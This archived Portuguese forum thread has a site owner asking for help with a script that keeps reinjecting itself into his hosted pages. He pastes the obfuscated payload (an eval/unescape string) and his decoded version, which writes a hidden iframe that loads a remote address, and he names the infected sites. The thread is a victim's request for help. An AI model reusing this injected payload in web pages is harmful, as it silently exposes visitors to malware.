[Arquivado] scripts maliciosos

[dfonte 0]

Olá pessoal, estou com um probleminha chato q está me deixando louco.

 

Tenho vários sites hospedados em um servidor online e na maioria deles, nas págias index.php, index.html ou login.php estão aparecendo o script

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%37%37%33%39%38%35%33%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%30%37%30%36%29%2b%27%32%37%66%31%5c%27%20%77%69%64%74%68%3d%32%36%36%20%68%65%69%67%68%74%3d%33%34%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));</script>

 

Traduzindo este script obtive o seguinte resultado:

window.status='Done';document.write('<iframe name=9 src=\'http://977398530?'+Math.round(Math.random()*90706)+'27f1\' width=266 height=341 style=\'display: none\'>')

 

Este código chama alguns virus para o meu computador inclusive o virus dos acentos duplos. Eu removo este script da página e faço upload para o ftp mas em pouco tempo o script volta novamente.

 

Eu gostaria de saber por onde este script esta entrando no meu ftp e como ele esta sendo gravado nas páginas do site. Eu pensei q fosse meu computador q estivesse infectado mas eu formatei o PC e criei uma página index.html simples e coloquei em uma determinada pasta no ftp e mesmo assim o maldito script apareceu nesta página.

 

Se vcs puderem me ajudar eu fico agradecido.

 

Obrigado

[Cristiano Severino 0]

dfonte,

 

Esse servidor onde fica seus sites, somente você tem acesso?

Ou tem mais alguem que hospeda lá?

Onde fica esse servidor dentro da sua rede?

Será que não tem outras maquinas nesta rede com virus que se espalha para o seus servidor?

 

Atenciosamente

[dfonte 0]

então trabalho com a redehost .... fica no brasil

 

tenhu um plano de revenda de 3gb

 

nesses 3gb estão os sites .... mas tem outros sites lá

 

pensei q era o servidor .... mas joguei um site em outro servidor q fica no locaweb e deu o mesmo problema

 

coloquei o arquivo não tinha o script .... depois de algumas horas o script apareceu

 

alguem pode ajudar ?

 

obrigado a todos

 

 

fui

[dfonte 0]

ahhhh o site q esta na redehost é www.torkmoinhos.com.br

 

clica em exibir código fonte e ta lá no fim da página o script

 

e o outro q est´´a na locaweb ´´e

 

http://www.guiadaspracas.com.br/fernando/

 

clica em exibir código fonte e ta lá no fim da página o script

 

esse script traz o virus dos acentos duplos ´´ ~~ ^^

 

por favor ....alguem souber de algo pra acabar com isso

 

obrigado

[dfonte 0]

sobe

[Mário Monteiro 179]

Tópico Arquivado

 

Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado.

 

Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.